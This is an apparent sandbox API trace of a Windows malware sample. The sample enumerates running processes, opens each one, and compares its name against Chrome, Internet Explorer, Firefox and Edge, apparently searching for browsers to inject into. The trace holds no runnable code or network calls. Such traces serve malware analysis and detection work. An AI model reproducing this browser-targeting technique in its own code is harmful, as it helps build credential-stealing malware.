	[0197.064] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0197.065] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1310
	[0197.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.065] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0197.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.065] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.065] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0197.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.066] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.066] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0197.066] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1314
	[0197.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.067] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0197.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.067] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.067] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0197.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.067] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.068] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0197.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1318
	[0197.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.068] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0197.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.069] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.069] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0197.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.069] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.070] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0197.070] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x131c
	[0197.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.070] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0197.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.071] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.071] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0197.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.071] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.071] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0197.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1320
	[0197.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.072] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0197.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.073] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.073] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0197.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.073] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.073] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0197.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1324
	[0197.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.074] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0197.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.075] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.075] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0197.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.075] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.076] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0197.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1328
	[0197.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.076] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0197.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.077] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.077] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0197.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.077] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.077] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0197.078] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x132c
	[0197.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.078] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0197.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.078] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.079] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0197.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.079] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.079] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.080] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1330
	[0197.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.080] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.080] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.081] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.081] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.081] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.082] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1334
	[0197.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.082] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.082] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.083] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.083] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.083] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.084] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1338
	[0197.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.084] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.084] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.084] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.085] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.085] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.086] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x133c
	[0197.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.086] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.086] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.086] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.087] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.087] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1340
	[0197.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.088] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.088] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.088] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.089] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.089] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1344
	[0197.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.090] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.090] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.090] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.091] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.091] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1348
	[0197.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.092] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.092] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.092] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.093] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.093] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0197.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x134c
	[0197.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.094] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0197.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.094] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.094] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0197.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.095] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.095] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.096] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1350
	[0197.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.096] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.096] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.096] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.097] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.097] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0197.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1354
	[0197.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.098] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.098] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.098] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.099] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.099] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0197.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1358
	[0197.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.100] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0197.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.100] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.100] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0197.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.100] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.101] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x135c
	[0197.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.101] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.102] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.102] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.102] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.103] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0197.103] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1360
	[0197.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.103] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0197.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.104] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.104] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0197.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.104] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.105] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0197.105] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1364
	[0197.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.105] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0197.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.106] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.106] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0197.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.154] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.154] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0197.155] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1368
	[0197.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.155] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0197.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.155] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.155] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0197.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.155] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.156] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0197.156] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x136c
	[0197.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.156] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0197.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.157] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.157] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0197.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.158] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.158] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0197.158] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0197.158] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0197.159] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1370
	[0197.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.159] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0197.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.160] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
